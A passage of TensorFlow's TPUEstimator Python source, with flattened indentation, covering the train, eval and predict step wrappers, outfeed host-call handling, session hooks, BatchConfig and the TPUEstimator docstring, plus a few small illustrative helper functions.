A tuple of train_fn, host_calls, captured scaffold_fn, and captured
training hooks. The train_fn represents the train step for TPU.
"""
host_call = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(loss):
"""Training step function for use inside a while loop."""
del loss # unused; required in function signature.
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, True)
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
if self._ctx.embedding_config is None:
apply_sparse_grads = []
else:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
gradients = (
tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
tpu_embedding_)
)
grad_multiplier = self._ctx.embedding_config.get_grad_multiplier()
if grad_multiplier is not None:
scaled_gradients = collections.OrderedDict(
(k, v * grad_multiplier) for k, v in six.iteritems(gradients))
else:
scaled_gradients = gradients
apply_sparse_grads = [
tpu_embedding_.generate_send_gradients_op(scaled_gradients)
]
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op] + apply_sparse_grads):
host_call_outfeed_ops = []
host_call_fn, host_call_args = None, []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call_fn, host_call_args = estimator_spec.host_call
if host_call_fn:
# Ignore dummy hostcalls (no arguments)
if host_call_args:
host_call.record({'host_call': estimator_spec.host_call})
host_call_outfeed_ops = host_call.create_enqueue_op()
else:
# Create a host call for the loss to track execution progress
# Without this, we don't have any indication of the state of the
# TPU program.
host_call.record({
'host_call': (lambda loss_t: loss_t,
[array_ops.reshape(loss, [1])])
})
host_call_outfeed_ops = host_call.create_enqueue_op()
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, an eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat many times and then replicated to
all TPU shards. In addition, the input and output are slightly different.
The input, features and labels, should be taken from the TPU infeed rather
than from the input pipeline (input_fn) directly. The output is managed in
two stages. First, the model outputs, as the result of the evaluation
computation (usually model logits), are transferred from the TPU system to
the CPU. Then, all model outputs are concatenated on the CPU and sent to the
metric_fn for metrics computation. To fit this TPU evaluation pattern, the
original eval computation is reformulated as the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, captured scaffold_fn, and captured eval
hooks. The eval_fn represents the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, False)
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, captured scaffold_fn, and captured
predict hooks. The predict_fn represents the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Adds validation for prediction dictionary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, ops.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Makes deep copies of `config` and `params` in case the user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
# In export mode, params['use_tpu'] has already been set based on mode
# (i.e. True for _REWRITE_FOR_INFERENCE_MODE, False otherwise).
if not is_export_mode:
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
err_msg.format('training_chief_hooks') + ' If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
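# --- Illustrative sketch (hypothetical helper, not used by the class above).
# `_ModelFnWrapper._call_model_fn` inspects the user `model_fn` signature and
# only forwards `labels`/`mode`/`config`/`params` when the function declares
# them. The same pattern can be reproduced with the standard library:
def _example_selective_kwargs(model_fn, features, labels=None, mode=None,
                              config=None, params=None):
  """Illustrative only: call `model_fn` with just the arguments it declares."""
  import inspect

  declared = set(inspect.signature(model_fn).parameters)
  kwargs = {}
  for name, value in (('labels', labels), ('mode', mode),
                      ('config', config), ('params', params)):
    if name in declared:
      kwargs[name] = value
  return model_fn(features=features, **kwargs)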
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
with ops.device(tpu.core(0)):
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated tensors are passed to the host_fn,
which is executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constrain it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with ops.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
flat_dequeue_ops = []
for l in dequeue_ops:
flat_dequeue_ops.extend(l)
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
def _call_host_fn(fn, *args, **kw):
context = CatchInvalidHostcallFunctions()
context.Enter()
result = fn(*args, **kw)
context.Exit()
context.ExitResult(result)
return result
# It is assumed evaluation always happens on a single-host TPU system, so
# place all ops on the TPU host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# TODO(xiejw): Make the specification of the outfeed combination
# function more explicit and well-documented. We may want to give the
# user the option of concatenating along any axis.
if (self._ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST):
# If the infeed is in BROADCAST mode (each core receiving the same
# input), then we assume that the cores also produce identical
# copies of the same output, and we simply take the output from
# the first core. This mode is used by Mesh-TensorFlow.
with ops.control_dependencies(dequeue_ops[i]):
dequeue_ops[i] = array_ops.identity(dequeue_ops[i][0])
else:
# Assume that the input has been batch-split and that axis 0 of the
# output tensors represents the batch size. Concatenate along
# the axis 0 to re-combine the batch.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
else:
ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)
# Force all dequeue operations to run even if they are not consumed by the
# host calls.
ret['__force_dequeue'] = control_flow_ops.group(*flat_dequeue_ops)
return ret
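# --- Illustrative sketch (pure Python, hypothetical values). `_OutfeedHostCall`
# flattens the tensors of every recorded host call into one outfeed tuple and,
# after dequeuing on the host, slices them back per name using running
# position offsets. The bookkeeping looks like this:
def _example_hostcall_slicing():
  """Illustrative only: slice a flat list of dequeued values back by name."""
  # Two host calls were recorded, contributing 2 and 1 tensors respectively.
  names = ['eval_metrics', 'host_call']
  num_tensors = {'eval_metrics': 2, 'host_call': 1}
  flat_dequeued = ['labels_t', 'logits_t', 'loss_t']  # stand-ins for Tensors

  sliced, pos = {}, 0
  for name in names:
    sliced[name] = flat_dequeued[pos:pos + num_tensors[name]]
    pos += num_tensors[name]
  # {'eval_metrics': ['labels_t', 'logits_t'], 'host_call': ['loss_t']}
  return sliced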
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
logging.info('global_step/sec: %g', global_step_per_sec)
logging.info('examples/sec: %g', examples_per_sec)
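# --- Illustrative sketch (made-up numbers): the throughput arithmetic used by
# the hook above. The hook is attached via the `hooks` argument of
# `Estimator.train` with the *global* batch size.
def _example_examples_per_sec(batch_size=1024, elapsed_steps=100,
                              elapsed_time=12.5):
  """Illustrative only: global_step/sec and examples/sec computation."""
  global_step_per_sec = elapsed_steps / elapsed_time   # 8.0 steps/sec
  examples_per_sec = batch_size * global_step_per_sec  # 8192.0 examples/sec
  return global_step_per_sec, examples_per_sec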
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
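# --- Illustrative sketch (standard library only): the save/override/restore
# pattern implemented by InstallSignalHandlerHook above.
def _example_sigint_swap():
  """Illustrative only: temporarily force SIGINT to the default handler."""
  import signal

  original = signal.getsignal(signal.SIGINT)
  signal.signal(signal.SIGINT, signal.SIG_DFL)  # CTRL^C now force-quits
  try:
    pass  # training/evaluation would run here
  finally:
    signal.signal(signal.SIGINT, original)      # restore the previous handler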
class ExportSavedModelApiVersion(enum.Enum):
V1 = 1
V2 = 2
class BatchConfig(
collections.namedtuple('BatchConfig', [
'num_batch_threads', 'max_batch_size', 'batch_timeout_micros',
'allowed_batch_sizes', 'max_enqueued_batches'
])):
"""Class to handle config inputs into the batching function."""
def __new__(cls,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes,
max_enqueued_batches=10):
"""Creates an EmbeddingConfigSpec instance.
Args:
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op
to pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to
10.
Returns:
A BatchConfig instance.
"""
return super(BatchConfig, cls).__new__(
cls,
num_batch_threads=num_batch_threads,
max_batch_size=max_batch_size,
batch_timeout_micros=batch_timeout_micros,
allowed_batch_sizes=allowed_batch_sizes,
max_enqueued_batches=max_enqueued_batches)
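# --- Illustrative sketch (hypothetical values): constructing a BatchConfig for
# the V2 export path. `allowed_batch_sizes` must increase monotonically and
# its last entry must equal `max_batch_size`.
def _example_batch_config():
  """Illustrative only: a BatchConfig for serving-time batching."""
  return BatchConfig(
      num_batch_threads=2,
      max_batch_size=8,
      batch_timeout_micros=5000,
      allowed_batch_sizes=[2, 4, 8])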
@estimator_export(v1=['estimator.tpu.TPUEstimator'])
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` gets per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. If eval_on_tpu is False, the evaluation will execute on
CPU or GPU; in this case the following discussion on TPU evaluation does not
apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.compat.v1.metrics.accuracy(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is a list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical systems. In addition, due to some
usability issues, for prediction with a small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shut down the TPU system
properly for the user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also accept a Dataset as the return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random.uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=predict_input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_saved_model` exports 2 metagraphs, one with `saved_model.SERVING`, and
another with `saved_model.SERVING` and `saved_model.TPU` tags. At serving
time, these tags are used to select the appropriate metagraph to load.
Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If not,
please use `session.run(tpu.initialize_system())`.
There are two versions of the API: ExportSavedModelApiVersion.V1 and V2.
In V1, the exported CPU graph is `model_fn` as it is. The exported TPU graph
wraps `tpu.rewrite()` and `TPUPartitionedCallOp` around `model_fn` so
`model_fn` is on TPU by default. To place ops on CPU,
`tpu.outside_compilation(host_call, logits)` can be used.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] = (
    export_output_lib.ClassificationOutput(classes=classes))
tpu.outside_compilation(host_call, logits)
...
```
In V2, `export_saved_model()` sets the `params['use_tpu']` flag to let the user
know whether the code is exporting to TPU (or not). When `params['use_tpu']` is
`True`, users need to call `tpu.rewrite()`, `TPUPartitionedCallOp` and/or
`batch_function()`. Alternatively, use `inference_on_tpu()`, which is a
convenience wrapper for the three.
```
def model_fn(features, labels, mode, config, params):
...
# This could be some pre-processing on CPU like calls to input layer with
# embedding columns.
x2 = features['x'] * 2
def computation(input_tensor):
return layers.dense(
input_tensor, 1, kernel_initializer=init_ops.zeros_initializer())
inputs = [x2]
if params['use_tpu']:
predictions = array_ops.identity(
tpu_estimator.inference_on_tpu(computation, inputs,
num_batch_threads=1, max_batch_size=2, batch_timeout_micros=100),
name='predictions')
else:
predictions = array_ops.identity(
computation(*inputs), name='predictions')
key = signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
export_outputs = {
key: export_lib.PredictOutput({'prediction': predictions})
}
...
```
TIP: V2 is recommended as it is more flexible (e.g. batching).
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
export_to_cpu=True,
warm_start_from=None,
experimental_export_device_assignment=False,
embedding_config_spec=None,
export_saved_model_api_version=ExportSavedModelApiVersion.V1):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
EstimatorSpec or TPUEstimatorSpec. `training_hooks`, `evaluation_hooks`,
and `prediction_hooks` must not capture any TPU Tensor inside the
model_fn.
model_dir: Directory to save model parameters, graph, etc. This can
also be used to load checkpoints from the directory into an estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be the same. If
both are `None`, a temporary directory will be used.
config: A `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently,
- TPU training and evaluation respect this bit, but eval_on_tpu can
override execution of eval. See below.
- Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
